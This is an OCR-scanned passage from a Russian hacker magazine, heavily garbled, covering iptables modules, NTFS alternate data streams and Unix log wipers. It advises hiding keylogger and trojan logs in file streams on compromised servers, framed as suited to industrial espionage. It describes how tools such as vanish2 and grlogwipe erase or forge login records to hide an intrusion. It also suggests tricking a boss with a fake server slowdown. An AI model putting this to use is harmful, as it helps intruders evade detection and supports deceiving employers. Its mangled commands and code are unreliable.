# іріаЫез -А ШРІЛ -р іср --сірогі 80 -т ііте -іітезіагі 20:00 

--іітезіор 08:00 --Рауз Моп.Тие.ѴесІ.ТІіи.Ргі -] КЕЛСТ 

Задача с ѵѵеЬ-сервером довольно проста. 
Но модуль ііте может пригодиться тебе и 
при решении более сложных проблем. Нап- 
ример, для организации льготных расценок 
для диалапщиков, временного ограничения к 
своему РТР-серверу и т.п. 

О. ІіЬірІ_гапсІот.50 

Представь, что ты работаешь каким-ни- 
будь сисадмином. Начальство, как обычно, 
жмется на апгрейд серверов, а мозгов в 
твой сервант хотелось бы добавить. Пара- 
доксально, но модуль гапсіот поможет те- 
бе вытрясти бабла с начальника. Только 
подумай: приходишь ты к шефу и просишь 
денег на оперативку. Естественно, что 
жмот-начальник посылает тебя куда по- 
дальше, мотивируя тем, что сервер пока 
справляется с нагрузкой. Вот тут-то ты его 
и поправишь :). Говори: «Да я даже ло- 
кально не могу до ІііірсІ достучаться!» - и 
на его глазах соединяйся с сервером, ко- 
торый будет изрядно притормаживать при 
каждом третьем подключении. Это дело 
заставит начальника задуматься и выде- 
лить пару сотен зеленых президентов для 
покупки кучи оперативной памяти. На са- 
мом деле сервер ничем не нагружен. 
Просто в силу вступает правило с опреде- 
ленной вероятностью (в нашем случае 
33%). То есть модуль гапсіот позволяет ак- 
тивировать событие случайным образом. 

На мой взгляд, это очень полезная фича, 
которую можно заюзать при самых разных 
обстоятельствах. Кстати, перед тем, как 
идти к шефу на ковер, не забудь выпол- 
нить следующую команду: 

# іріаЫез -А ШРІЛ -р іср --(Ірогі 80 -т гапсіот -аѵегаде 33 -] 

КЕЭЕСТ 




а Все параметры 
того или иного мо- 
дуля ты можешь 
посмотреть с по- 
мощью команды 
ірІаЫез -ш модуль 
--Ііеір 




л К моменту напи- 
сания статьи поя- 
вился свежий ре- 
лиз іріаЫез 
ѵ.1 .2.1 1 . Поэтому 
можешь установить 
РОМ с этой верси- 
ей файрвола. 




А Чтобы очистить 
все 0$ РіпдегРгіпіз 
модуля 0$Р, напиши 
команду: есію -еп 
РШ5Н > / 

ргос/зуз/пеІ/ірѵ4/о5І. 
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А Чтобы устано- 
вить пакет Іегш- 
сар, выкачай его с 
РТР-сервера 
Нр.дпи.огд/Іегт- 
сар и заинсталь. 
Тонкость конфигу- 
рирования заклю- 
чается в дополни- 
тельной опции к 
скрипту сопіідиге. 
Команда должна 
выглядеть так: 
./сопіідиге -- 
епаЫе-іпзІаІНегт- 
сар. 



л На нашем диске 
ты найдешь архив 
с РОМ, свежим ірі- 
аЫез, а также не- 
обходимую библи- 
отеку Іегтсар. 




а На странице 
ІіИр://пеШІег.огд/ 
раІсЬ-о-шаІіс/рот- 
Ьазе.МтІ ты мо- 
жешь прочитать 
краткое описание 
каждого модуля. 



О. ІіЬірІ_трог1.50 и ІіЬірІ_іргапде.зо 

Обычно файрвол настраивается по до- 
вольно примитивной схеме. Оговаривается 
список портов, с которыми разрешено сое- 
динение, а затем меняется политика бранд- 
мауэра. Из-за того, что ірІаЫез не умеет об- 
рабатывать все порты в одном правиле, лист 
рулесов был очень большим. Теперь, при 
наличии модуля троіі, все становится про- 
ще. Можно с помощью всего одной команды 
указать все необходимые порты: 

# ірІаЬІе$ -А ШРІЛ -р Іср -ш трог! ~(1рогі$ 

21,22,25,110,4000:5000 -] АССЕРТ 

Удобно? Несомненно! Бьюсь об заклад, 
что многие админы порадуются этому прек- 
расному модулю. Аналогично действует патч 
іргапде, который позволяет указывать диапа- 
зон ір-адресов для разрешения/запрета 
подключений: 

# ірІаЬІе$ -А ШР11Т -р Іср -ш іргапде --згс-гапде 192.168.0.1- 

192.168.0.254 -і АССЕРТ. 

О. ІіЬірІ ТАВРІТ.зо 

Иногда приходится создавать пустые со- 
кеты. Это так называемое соединение в 
пустоту. К примеру, на твой сервер посто- 
янно цепляется какой-нибудь хакер из забу- 
горья либо постороннее приложение. Всего 
одним правилом, без помощи посторонних 
программ ты можешь создать блокирующий 
пустой сокет. Фича и удобство метода зак- 
лючается в том, что порт будет светиться в 
момент коннекта на него. Все это работает 
благодаря модулю ТАВРІТ и контейнеру в 
ірІаЫез. 

# іріаЫе$ -А ШРІЛ -р Іср -сірогі 31337 -] ТАКРІТ 




О. ІіЬірі_соппІіті1.зо 

Случается, что любимый софт не умеет 
поддерживать какую-либо возможность, без 
которой приходится выбирать другую прог- 
рамму. Например, твой любимый демон не 
умеет ограничивать максимальное число 
подключений. С помощью модуля соппіітіі 
можно запросто оговорить максимальное 
число запросов к какому-либо порту. Меня 
как админа это безумно порадовало, можно 
сказать, я ставил РОМ только ради этого мо- 
дуля. Допустим, ты хочешь разрешить толь- 
ко три подключения к 53 порту. Вот как выг- 
лядит рулес для файрвола: 

# ір!аЫе$ -А ШРІЛ -р Іср — зуп -сірогі 23 -т соппіітіі -- 

соппІітіІ-аЬоѵе 3 -] РЕЭЕСТ 

Иногда приходится ограничивать подклю- 
чения по определенному сегменту. Напри- 
мер, установить правило на три потока из 
сети с маской /24 можно так: 

# ір!аЫе$ -р Іср -$уп --сірогі 80 -т соппіітіі -соппіітіі- 

аЬоѵе 3 --соппІітіІ-та$к 24 -] КЕЛСТ 

О. ІіЬірІОЗР.зо 

Очень интересный модуль. Когда ты его 
поставишь, появляется возможность ограни- 
чения доступа по операционной системе. 
Файрвол попытается сделать РіпдегРгіпі и 
довольно точно узнать систему. Соответ- 
ственно, если у чувака стоит ѴѴіпХР, ему зак- 
рывается доступ, а если чел продвинутый и 
юзает РгееВЗО, то коннект разрешается :). 
Все фантазии в твоих руках, и в этом я тебе 
не помощник. Лично я юзаю ОЗР только в 
качестве логирования запросов на опреде- 
ленные порты. Итак, прежде чем писать пра- 
вило, сливай все финжерпринты с адреса 
ѵѵѵѵѵѵ.орепЬ$с!.огд/сді-Ьіп/сѵ$ѵѵеЬ/$гсМс/рГо$. Затем 
перенаправляй файл рТоз в 
/р гос/зуз/п е 1/і рѵ4/озТ (вынос про РШЗН). Те- 
перь составляй правило. Я приведу пример 
рулеса, после активации которого вся ста- 
тистика отобразится в /ѵаг/іод/зузіод/тез- 
задез. В целом правило выглядит следую- 
щим образом: 

И ірІаЬІе$ -А ШРІЛ -] АССЕРТ -р Іср -т о$Т --депге Ыпих — Іод 1 

--зтагі 

Опция Іод отвечает за логирование. Если 
ее значение равно единице, в теззадез поя- 



вится лишь одна запись за весь процесс об- 
мена данными. Если опция не определена 
либо равна нулю, запишется статистика по 
каждому пакету. Параметр зтаіі позволяет 
юзать более точное определение ОЗ. 

О. ИЬірНішіі 

Этот модуль позволяет ограничивать 
число пакетов за единицу времени, подхо- 
дящих под какое-либо правило. К примеру, 
ты замечаешь, что кто-то пытается заслать 
кучу пакетов на определенный порт и 
ждет, пока демон уйдет в даун. Обломать 
нарушителя сетевого порядка и предотвра- 
тить ОоЗ-атаку можно с помощью одного 
простого правила: 

# ірІаЫез -А ШРІЛ -р Іср --сірогі 53 -ш ІітіІ - ІітіІ 10/$ес -\ 

РЕЭЕСТ 

Думаю, понятно. Выставляется ограниче- 
ние на число пакетов в секунду. Также ты 
можешь использовать минутный, часовой и 
суточный интервал. 

О. ІіЬірі_5ігіпд 

Наконец-то файрвол научился искать 
подстроку в целом пакете. Нередко требу- 
ется фильтровать данные на предмет зап- 
рещенных строк. Это могут быть как не- 
цензурные слова :), так и строки, харак- 
терные для бэкдоров. Допустим, ты суро- 
вый админ и запрещаешь заливку бинар- 
ников на твой ГТР-сервер. Правило будет 
следующим: 

II ірІаЫез -А ШРІЛ -р Іср -сірогі 21 -т зігіпд -зігіпд '|7Е|ЕЕЕ' 

-] 0К0Р 

А И ЭТО НЕ ПРЕДЕЛ! 

Это лишь часть модулей, про которые мне 
хотелось бы рассказать. На самом деле 
РОМ содержит порядка сотни различных 
обновлений. Естественно, упомянуть про 
все в рамках одной статьи невозможно. 

Цель данного материала - натолкнуть тебя 
на правильную мысль и разубедить в не- 
достижимой мощности файрволов р{ и іріѵѵ. 
Как видишь, всего за несколько часов я 
сделал из ірІаЫез настоящую конфетку. Те- 
перь ничто не мешает тебе повторить мои 
действия и пропатчить брандмауэр. И я 
уверен, что РОМ поможет решить множест- 
во наболевших проблем. ЗС 
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ЧЕМ ЗАРЯЖАЕТСЯ 

РІЯДМШ1 «ШИИя? 







И зламывая очередную ИТ-систему и устанавливая самодельный шпионский слфт, остерегайся: на сервере могут стаять специальные 
утилиты, контрлпирующие цеплстнлсть системных файплв, и злобный ацмин с красными глазами плчти сразу запалит твлй мегабайтный 
пот с паролями, который ты па дурости положил в зуз!ет32. Чтобы избежать этого, многие начинают изобретать велосипед, в то время 
как сами программисты МісгозоА все уже придумали до нас :). Точи коньки, сегодня ты научишься вытворять с МТТ8 настоящие пируэты! 



робою с Файловыми потоками в итгз 



к. 




А ВОЗМОЖНОСТИ N118 

К ак я уже отмечал, большая 

часть популярных кейлогеров, 
троянов и прочего шпионско- 
го софта хранит свои логи 
в системных директориях с 
большим количеством фай- 
лов. Это распространенный, 
но далеко не лучший способ 
спрятать информацию на локальном компь- 
ютере. Есть возможность, что пользователь 
заметит лишний постоянно обновляющийся 
файл, который неожиданно появился у него 
в системном каталоге. Согласись, не катит. 
Что же делать? Дописывать лог к уже суще- 
ствующему файлу? Для начала надо найти 
такой файл, добавление к которому инфор- 
мации не испортит его содержимого. 

Да и все равно, это какое-то палево. 

А как насчет того, чтобы сохранять инфу в 
такое место, которое не будет видно ни из 
проводника, ни из командной строки, ни из 
любого файлового менеджера? Такую воз- 
можность нам предоставляет файловая сис- 
тема МТРЗ. На обычной домашней персонал- 
ке ее редко встретишь, так как большинство 
пользователей по-прежнему предпочитают 
РАТ32, даже те, кто сидит под ХР. Но зато в 
локальной сети какой-нибудь крутой органи- 



зации, работающей под ѴѴіп2к/ХР, почти на- 
верняка используется ІМТР5: эта файловая 
система предоставляет широкие по меркам 
ѴѴіпсІоѵѵз возможности квотирования диско- 
вого пространства, разграничения прав дос- 
тупа, шифрования и компрессии файлов. 
Кроме того, МТЗ в силу своей организации 
гораздо более надежна, чем РАТ32. Так что 
метод сокрытия данных, который я опишу, 
идеально подходит для промышленного 
шпионажа. С появлением же І_опдІіогп МТРЗ 
имеет шанс обосноваться и на дисках до- 
машних компов, т.к. грядущая файловая сис- 
тема ѴѴіпРЗ, основанная на МТРЗ, обещает 
дополнительные возможности по упорядочи- 
ванию и поиску информации, которые долж- 
ны привлечь домашних пользователей. 

А КРЕПИМ ДОННЫЕ К ФОЙПОИ 

Предлагаемый мною способ заключается в 
том, чтобы сохранять данные не в файл, как 
обычно, а в файловый поток МТРЗ. Поток мож- 
но прикрепить к любому файлу, к каталогу или 
даже к целому разделу. При этом размер фай- 
ла не меняется и данные остаются нетронуты- 
ми, а значит утилиты, проверяющие контроль- 
ные суммы файлов, не заметят изменений. 

Альтернативные файловые потоки МТРЗ - 
это одна из возможностей МТРЗ, присутству- 



ющая в ней еще с самых ранних версий 
ѴѴіпсІоѵѵз МТ. Она заключается в том, что у од- 
ного файла может быть несколько потоков, 
содержащих данные, причем пользователю 
доступен лишь главный поток, в котором хра- 
нится содержимое файла, остальные же пото- 
ки через обычный файловый менеджер юзеру 
разглядеть не удастся. Нечто похожее реали- 
зовано в файловой системе НРЗ на макинто- 
шах. Там потоки (зігеатз) называются разве- 
твлениями (Тогкз). До недавнего времени они 
использовались для хранения некоторых ре- 
сурсов файла либо информации о типе. С по- 
явлением Мае ОЗ X Арріе рекомендовала по- 
мещать ресурсы в отдельные файлы, а типы 
файлов определять по расширениям, таким 
образом, отпала сама необходимость в под- 
держке этих самых разветвлений. Однако 
разработчики системы не отказались от пото- 
ков, т.е. они поддерживаются системой, но 
никак не используются. Вернее, используются - 
людьми, ломающими Мае ОЗ :). 

В ѴѴіпсІоѵѵз потоки обычно используются 
для хранения какой-то дополнительной ин- 
формации о файле. Например, в потоке 
может содержаться сводка документа - со- 
вокупность некоторых свойств, присущих 
данному типу файлов. Ну например, свод- 
ка видеороликов может содержать инфор- 
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мацию о разрешении мувика, используе- 
мом кодеке и т.д. 

Если система стоит на диске с ІЧТРЗ, то 
файл ехріогег.ехе наверняка содержит свод- 
ку. В зависимости от содержимого сводки к 
файлу могут прикрепляться потоки с имена- 
ми ЗиттагуІпТогтайоп, 
ОоситепіЗиттагуІп^огтаііоп и некоторые 
другие. Исследуя собственную файловую 
систему, я обнаружил у себя на компьютере 
поток с именем ЗМоипМдгВетоІеОаІаЬазе, 
прикрепленный к диску С. 

О прикрепленных к файлу потоках пользо- 
ватель может узнать лишь в некоторых слу- 
чаях. Например, при перемещении файла с 
прикрепленным потоком на диск с 
РАТ/РАТ32. Эти файловые системы, как и 
следовало ожидать, не поддерживают пото- 
ки, поэтому система выдаст запрос на подт- 
верждение потери информации в зігеат’ах, 
указав их названия. Разумеется, такая ситуа- 
ция никогда не возникнет, если поток прик- 
реплен к диску или к системной папке. 

Как ты уже, наверное, понял, потоки в сов- 
ременных файловых системах используются 
очень часто. Я бы также предостерег тебя от 
мысли, что основное применение им - пря- 
тать в файловой системе поломанного серве- 
ра своих троянов, кейлогеров и прочих пара- 
зитов :). Например, если ты разработчик 
зИагеѵѵаге-программ, то вполне можешь ис- 



пользовать файловые потоки для хранения 
информации о дате регистрации и количестве 
дней до истечения срока использования. Сло- 
вом, в потоках можно размещать все то, что 
должно быть скрыто от пользователя твоей 
программы. Впрочем, следует отчетливо по- 
нимать, что у толкового крякера такой метод 
защиты шаровары может вызвать только 
громкий смех ;). 

Пробою с потоками 

В работе с файлами и потоками есть и сход- 
ства, и различия. Хотя, конечно, различий ку- 
да больше :). И файлы, и их потоки создают- 
ся и удаляются одними и теми же ѴѴіпАРІ 
функциями: СгеаІеРіІе и ЭеІеІеРіІе. Чтение и 
запись реализуются, соответственно, функ- 
циями ВеабРіІе и ШеРіІе. На этом, 
собственно, сходства заканчиваются и начи- 
наются различия. В именах потоков могут со- 
держаться спецсимволы, которые не могут 
быть частью имени нормального файла. Нап- 
ример, «*», «?», «<», «>», «|» и кавычки. Во- 
обще, любое имя потока сохраняется в фор- 
мате ІІпісосІе. Стало быть, в названиях могут 
использоваться и служебные символы из ди- 
апазона 0x01 - 0x20. Нет стандартной функ- 
ции копирования и переноса потока: МоѵеРіІе 
и СоруРіІе с потоками не работают. Впрочем, 
никто не мешает написать свои собственные 
функции. У потоков отсутствуют собственные 
атрибуты, такие, как дата создания и моди- 
фикации: эти признаки наследуются от фай- 
ла, к которому прикреплены потоки. 

Если в самом файле присутствуют ка- 
кие-либо данные, их тоже можно предста- 
вить в виде потока. Имена потоков строят- 
ся так: «имя_файла:имя_потока:атрибут». 
Стандартный атрибут потока, в котором на- 
ходятся данные, называется $Эа{а. Есть 
много других атрибутов, имена которых 
также начинаются со знака «$». Содержи- 
мое файла находится в бе- 
зымянном потоке (имя фай- 
ла::$ОАТА). С этим свой- 
ством файловой системы 
представлять содержимое 
файла в виде потока был 
связан баг в старых версиях 
МісгозоЙ N3. В то далекое 
время хакер, который хотел 
узнать текст какого-либо 
сценария на уязвимом сер- 
вере, просто добавлял к его 
имени «::$ОАТА», и сервер 
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ДРУГИЕ ПОТОКОВЫЕ ВИРУСЫ 



К роме ѴѴ2К.5ігеапл, потоки 
нашли применение и в дру- 
гих вирусах и червях. Первым 
червем, использовавшим 
файловые потоки, являлся I- 
ѴѴогт.РоІюк. Эта зверушка 
прикрепляет несколько пото- 
ков к файлу осІЬс.іпі в каталоге 
ѴѴіпсІоѵѵз и хранит там скрипты 
для рассылки себя по почте. 

Еще одним «зігеапп соплрап- 
іоп» вирусом является 

ѴѴ2к.Теапл. Описание этих и других подобных вирусов ты мо- 
жешь найти на сайте ѵѵѵѵѵѵ.ѵігигіігі.сот. 




• Как изменить внешний вид 
КПК - темы для 2І_аипсЬег 
и ТИетеМакегРго РІиз 



• Как заархивировать данные 

и освободить место - Роскеі РАР 

• Как запустить игру для М5-005 
на Роскеі: РС 

• Как сделать резервную копию 
памяти Раіт 



• Как убить заразу - мульти- 
платформенный антивирус 
для КПК 



ЛПС 



МОБИЛЬНЫЕ 

КОМПЬЮТЕРЫ 






вместо того, чтобы выполнить скрипт, вы- 
давал его исходный код. 

Работа с потоками, в общем -то, похожа 
на работу с файлами. В качестве простого 
примера я написал программу, создающую 
файл с потоком и записывающую в него ин- 
формацию. Вот ее код: 




л Существует ле- 
генда о том, что 
поток можно уда- 
лить только вместе 
с файлом, к кото- 
рому он прикреп- 
лен. Это не так. 

Если ты знаешь 
название потока, 
то всегда сможешь 
удалить его стан- 
дартной функцией 
ОеІеІеРіІе. 

45В- 

л Как обычно, все 
описанные исход- 
ники, а также все 
упомянутые в 
статье программы 
ты найдешь на на- 
шем диске. 



Пример создания потока 



йіпсЫе <ѵѵіпс](ж[і> 
іпі таіп() 

{ 

0Ш0 Меі; 

НАМ іі$ігеат = СгеаІеРіІеСМЫгеат", 6ЕШІС МНЕ, 
РИЕ.5НАВЕШТЕ, Ш, 0РЕШШ8, ІШ, Ш ); 

МеРіІе( ІіРіІе, "Тйіз і$ а $ігеат", 17, &Меі, МІІИ); 

СІо$еНапс1Іе(ЕіЗІгеат); 

геіигп 0; 

} 

Если тебе захочется протестить програм- 
му на своей системе, не нужно перебивать 
исходник из журнала - готовый бинарник и 
исходный код лежит на нашем диске. После 
запуска этой программы в ее каталоге поя- 
вится абсолютно пустой (по мнению любого 
файлового менеджера) файл ІезШе. Увидеть 
содержимое прикрепленного потока можно, 
набрав в командной строке тоге < ІезШе: 
зігеат. Как видишь, имя потока указывается 
после имени файла, отделенное от него 
знаком двоеточия. Самое трудное при рабо- 
те с потоками - это получить их список для 
конкретного файла. Стандартной функции 
нет, и поэтому придется писать ее самому. 
Давай напишем небольшую консольную 
программу, которая бы возвращала список 
потоков по имени файла. Такая прога есть у 
ребят из Зузіпіегпаіз, причем она поставля- 
ется открытым кодом, но мне не понравился 
их способ. Они используют вызовы №йѵе 
АРІ, и поэтому их код большой и трудный 
для понимания. Мы же напишем свою соф- 
тину, которая будет работать из командной 
строки, с алгоритмом попроще и со станда- 
ртными АРІ-функциями. 

А попучпен список потоков 

Как же можно получить список потоков, прик- 
репленных к файлу? Туг все совсем не слож- 
но. Мы воспользуемся стандартной функцией 
ВаскирВеасІ, предназначенной для резервного 
копирования файлов. Когда делаешь резерв- 
ную копию файла, важно сохранить как можно 
больше данных, включая и инфу в файловых 
потоках. Информация берется из структуры 




ПОПУЛЯРНЫЙ СОФТ ДПЯ РОБОТЫ с потокпии 

З адачу по обнаружению потоков успешно решают две 
удобные утилиты. Это Зітеатз 1.5 (ѵѵѵѵѵѵ.зузіпіегпаіз.сот/ 
Ліез/зігеатз.гір) и І_АЭ5 4.00 (ѵѵѵѵѵѵ. НеузоТС. гіе/пі/іасіз.гір). 
Также хочу отметить классную утилиту для работы с потоками 
ІЧТР5, написанную на С#, - АИегпаІе Эа1:а Зітеапл 

(ПІф://сПасЯісН.тузіІе4поѵ^сот/АІІегпаІе0аІа Бігеат.гір). 
А чтобы отловить все вражеские трояны, хранящие вредонос- 
ный код в файловых потоках, тебе просто необходима програм- 
ма под названием ТЭЗ-З (Шр://ІсІ5.сІіатопсІС5. 
сот.аи/іпс!ех.рІір?раде=с]оѵ\тІоасІ). Как обычно, все указан- 
ные программы ты найдешь на нашем диске. 



ѴШ32 3ТНЕАМЮ. Оттуда можно достать имя 
потока, его тип и размер. Нам понадобятся 
только потоки типа ВАСКІІ Р_АІ_ТЕКМАТЕ_ОАТА. 
Все функции и структуры описаны в заголо- 
вочном файле ѵѵіппі.Іі. 

Для начала надо открыть файл для чтения 
с помощью функции СгеаІеРіІе. В параметре 
сІѵѵНадзАпсІАйгіЬіЛез надо указать флаг 
РІ І_Е_РЕАС_ВАСКІІ РЗЕМАІМТІСЗ , что позво- 
лит открывать не только файлы, но и ката- 
логи. Затем запускаем цикл ѵѵМІе, который 
считывает информацию о файле в структуру 
зісі, из которой мы будем доставать инфор- 
мацию о каждом потоке. Перед следующим 
проходом цикла очищаем структуру и сдви- 
гаем указатель файла к следующему потоку 
с помощью функции ВаскирЗеек. После то- 
го как все потоки найдены, мы очищаем 
ІрСопІехІ, содержащий служебную информа- 
цию, и закрываем файл. 

Исходный код программы и собранный 
бинарник лежат на нашем диске, так что ты 
без проблем можешь его изучить и перекол- 
басить под себя :). Кстати, для работы с по- 
токами совсем не обязательно писать специ- 
альные программы. РІекоторые элементар- 
ные операции можно выполнять даже при 
помощи встроенных утилит ѵѵіпсіоѵѵз: 



Работа с потоками из консоли 



Создание файла с потоком: 
іуре пиі > $отеііІе.іхі:$ігеат 
Запись в поток: 

есііо "ЗотеШпд" » $отеііІе.іхі:$ігеат 
Чтение из потока: 
тоге < $отеііІе:$ігеат 

Копирование содержимого существующего файла в поток: 
іуре іііеі.іхі » $отеііІе.іхі:$ігеат 
Копирование содержимого потока в файл: 
тоге < $отеііІе.іхі:$ігеат » Іі1е2.іхі 

А ОБНПРШНИЕ 

Это все здорово, конечно, но как распознать 
в собственной системе файл с вредоносным 
потоком? :) Ведь прикрепив поток с инфор- 
мацией к чему-нибудь, до его содержимого 
трудно добраться, не зная его имени. Если 
поток прикреплен к логическому тому, то в 
ѴѴіпсІоѵѵз вообще нет стандартных средств, 
чтобы его обнаружить. Так как в имени по- 
тока могут содержаться символы, недопус- 
тимые в именах обычных файлов, это созда- 
ет дополнительные трудности при попытке 
узнать содержимое потока, пользуясь кома- 
ндной строкой. Содержимое сводки доку- 
мента обычно хранится в потоке с названи- 



ем, которое содержит символ с кодом 0x05. 
Этот символ можно набрать в консоли 
(СігІ+Е), но если бы это был символ 0x10 
или 0x13 (возврат каретки и перевод стро- 
ки), то набрать их было бы невозможно. Те- 
оретически ты можешь узнать о прикреп- 
ленных потоках случайно, используя некото- 
рый софт, который с большой вероятностью 
есть на твоем компьютере. В ѴѴіпВАВ есть 
опция «Сохранять потоки ИТРЗ», и если она 
включена, то ты можешь заметить, что раз- 
мер небольшого файла, помещенного в ар- 
хив, не только не уменьшается, а даже уве- 
личивается (за счет того, что данные в пото- 
ках тоже помещаются в архив). Это должно 
вызвать подозрения. 

Программа для отслеживания обращений 
к файловой системе НІеМопіІог от тех же 
Зузіпіегпаіз не делает различий между обра- 
щениями к файлам или потокам. Соответ- 
ственно, внимательное изучение лога обра- 
щений к диску подозрительной программы 
(твоего кейлогера) выдаст и название пото- 
ка, куда пишется лог, и имя файла, к которо- 
му он прикреплен. 

А вирусы 

В сентябре 2000 года появился первый ви- 
рус, использующий для своего распростра- 
нения альтернативные файловые потоки. 
ѴѴ2к. Зігеат был первым представителем но- 
вого типа вирусов - «зігеат сотрапіоп». Он 
ищет в своем каталоге ехе-файлы, и если 
находит, начинает процесс заражения. К 
файлу прикрепляется дополнительный поток, 
в который вирус переносит содержимое ори- 
гинального файла, а потом тело вируса ко- 
пируется в основной поток файла. После за- 
пуска зараженного файла вирус снова пыта- 
ется заразить файлы в своем каталоге, а за- 
тем запускает программу из дополнительно- 
го потока при помощи функции 
СгеаІеРгосезз. Причем файл с потоком мож- 
но спокойно удалить, а процесс останется. 
Просто сказка для троянов, согласись! Нес- 
мотря на то, что с момента появления 
ѴѴ2К.ЗІгеат прошло уже почти четыре года, 
еще не все антивирусы способны обнаружи- 
вать вредоносный код в файловых потоках. 
Поэтому появление новых червей и вирусов, 
использующих их, может представлять серь- 
езную опасность. 
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Т ы никогда не задумывался, почему админы быстро вычисляют непрофессиональных хакеров? Причина кроется в том, что неопыт- 
ный взломщик забывает почистить после себя логи, а если и чистит, то делает это так криво, что даже неопытный сисадмин легко 
догадается об атаке. Чтобы этого не произошло, тебе необходимо знать алгоритмы работы лучших чистильщиков для известных 
операционных систем. 



ПРИНЦИП РПБОТЫ СОВРЕМЕННЫХ ПОГВПЙПЕРОВ 




В ипіх-системах логи делятся 

на две принципиально разные 
части: бинарные и текстовые. 
Основное их отличие в том, 
что из бинарных журналов 
данные так просто не полу- 
чить. Обращаться к ним можно 
только через специальную 
структуру иітр, функции которой описаны 
в заголовочном файле іЛтр.Іі. Что касается 
текстовых логов, с ними работать проще 
и удобнее (как для админа, так и для хакера ;)). 
Для удаления данных достаточно отфильтро- 
вать строку обычным дгер'ом. 



Л БИНОРНПЯ 0БР0Б0ТКП 

Особый интерес изо всех логов представляют 
именно бинарные журналы. Во многих совре- 
менных операционных системах их три. Это 
/ѵаг/іод/ѵѵітр, /ѵаг/гип/Щтр и /ѵаг/Іод/ІазІІод. 
Сейчас я расскажу, зачем они вообще нужны. 
Первый лог служит для записи информации 
обо всех входах в систему. Скажем, вошел 
хакер под обрученным аккаунтом, и демон, 
обслуживающий вход (ззИсІ, например), его 
записал. Стоит администратору выполнить 
команду Іазі хакер, и он сразу же увидит ин- 
формацию о последнем входе взломщика, 
включая хост и время пребывания. 



Второй журнал необходим для логирова- 
ния информации о пользователях, которые 
находятся непосредственно за консолью. 
Если ты сидишь за терминалом на хакнутом 
сервере, то администратор может посмот- 
реть вывод команды ѵѵ (или ѵѵііо, изегз) и 
определить твое присутствие. Надо заме- 
тить, что запись из иітр стирается сразу же 
после покидания консоли. Что касается 
ѵѵітр, инфа в логе остается навсегда (по 




крайней мере, до твоего непосредственного 
вмешательства ;)). 

И наконец, /ѵаг/Іод/ІазІІод нужен для хра- 
нения информации о последнем заходе 
пользователя. В журнале хранятся данные по 
каждому системному юзеру (хост, терминал, 
время захода, имя пользователя), которые 
могут быть предоставлены администратору 
по команде Тіпдег либо ІазІІодіп. 

С назначением логов мы разобрались. Пе- 
ред тем как рассматривать работу конкретно- 
го логклинера, давай познакомимся с бинар- 
ным режимом работы. Как я уже сказал, для 
обращения к подобным журналам использу- 
ются специальные функции, описываемые 
в /изг/іпсіибе/иітр.іі. Вот список основных: 

л иітрпате(). Эта функция принимает 
единственный параметр - указатель на би- 
нарный файл, который должен быть прос- 
мотрен/отредактирован. Само собой, в каче- 
стве такого файла может использоваться лю- 
бой из вышеназванных журналов. 

л зеІиІепІ(). Функция вызывается без 
параметров в начале процесса обработки 
журнала. Ее суть заключается в установке 
указателя в самое начало журнала. В случае, 
когда обработка завершена, необходимо 
вызвать епсІиІепІ(). Данная функция коррект- 
но закроет журнал. 
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Основные функции для работы с бинарными логами 



Особый интерес 
представляют именно 



изо всех логов 
бинарные журналы. 



а деІиІепІ(). Данная процедура позволя- 
ет искать запись в журнале в определенном 
его участке. Эта функция возвращает запол- 
ненную данными структуру. В ней при жела- 
нии можно найти все необходимые поля: 
имя пользователя, хост, с которого юзер за- 
логинился, а также время захода. 

а рийгіІіпеО - процедура, которую мож- 
но увидеть в каждом логвайпере. Именно она 
подменяет найденную строку произвольными 
данными. Хотя чаще логклинер не изменяет 
запись в журнале, а просто удаляет ее. 

Вот и все функции, которые вызываются в 
процессе обработки бинарных логов. Теперь 
настало время посмотреть на практическую 
работу известных чистильщиков. В качестве 
подопытных программ я буду рассматривать 
три утилиты: ѵапізІі2, дгіодѵѵіре и гар2 под 
ЗипОЗ. 

А ІІ0ИІ8Н БЕЗ КИПЯЧЕНИЯ! 

Логвайпер с красноречивым названием 
Ѵапізіі (шо$с!.ги/$оГС/1/ѵапі$[і2.д2) используется 
для чистки не только бинарных, но и тексто- 
вых логов. Однако последние нас пока не 
особенно интересуют, поэтому я акцентирую 
твое внимание только на обработке бинар- 
ных журналов. Итак, особенность Ѵапізіі зак- 
лючается в том, что он не работает напря- 
мую с логом. Это и хорошо, и плохо однов- 
ременно. Минус заключается в том, что если 
ѵѵішр не обрабатывается утилитой ІодгоМе 
(то бишь не запаковывается в архив каждый 
месяц), копирование 1 00-мегабайтного фай- 



ла может затянуться на долгие минуты. С 
другой стороны, если к логу обратятся сразу 
два процесса (те же ззіісі и ррірб, напри- 
мер), произойдет ошибка, из-за которой 
журнал будет некорректно заполнен. 

Вторая особенность Ѵапізіі - чистка лога 
происходит с самого начала. Это также не 
совсем хорошо и сказывается на скорости 
при большом объеме файла. Если посмот- 
реть код логвайпера, можно увидеть следую- 
щий алгоритм работы: 

О. Копирование журнала в текущий ката- 
лог с расширением .Ііт. 

О. Поиск нужной строки с использовани- 
ем спец-структуры іЛтр. Для поиска вызы- 
вается стандартная функция геасі, считываю- 
щая одну строку из бинарного файла. 

®. Если эта строка содержит имя иско- 
мого юзера (а также хоста, если обрабаты- 
вается ѵѵітр), происходит обнуление всех 
полей структуры иітр с последующим зане- 
сением в лог. 

О. Закрытие фай- 
ла и перенос его на 
исходное место. 



Несмотря на нем- 
ногочисленные отри- 
цательные моменты, 
Ѵапізіі оправдал мои 
ожидания. Он ста- 
бильно работает на 
всех пингвинах, без 



проблем вычищая бинарные записи. К сожа- 
лению, на фряхе логклинер вообще не ком- 
пил ится, поэтому там приходится юзать дру- 
гую софтину под названием дгіодѵѵіре. 

Л ШОСШІРЕ - И ВСЕ ЧИСТО 

Этот логвайпер намного продуманнее, чем 
Ѵапізіі, хотя профиль его работы - только би- 
нарные логи. Огіодѵѵіре (шѵѵ.п$сІ.ги/$оК/1/дгІод- 
ѵѵіре.іаг.іаг) компилится на всех системах и 
имеет ряд преимуществ перед Ванишем. 

Во-первых, этот чистильщик снабжен туе- 
вой хучей опций. Логклинер способен не 
только удалять, но и изменять записи в 
ѵѵітр, превращая логин хакера в аккаунт ад- 
министратора, либо модифицировать запи- 
санный хост и время. Во-вторых, утилита на- 
чинает просмотр бинарного файла не с нача- 
ла, а с конца. Это оправданно, поскольку ча- 
ще всего нужные записи находятся именно в 
конце журнала. Соответственно и выигрыш в 
скорости будет огромным (несмотря на 
большой размер лога, операция по его 
очистке займет пару секунд). В остальном 
Огіодѵѵіре похож на Ѵапізіі. Он использует ту 
же структуру иітр и похожие функции. Не 
веришь? Зацени исходник :). 

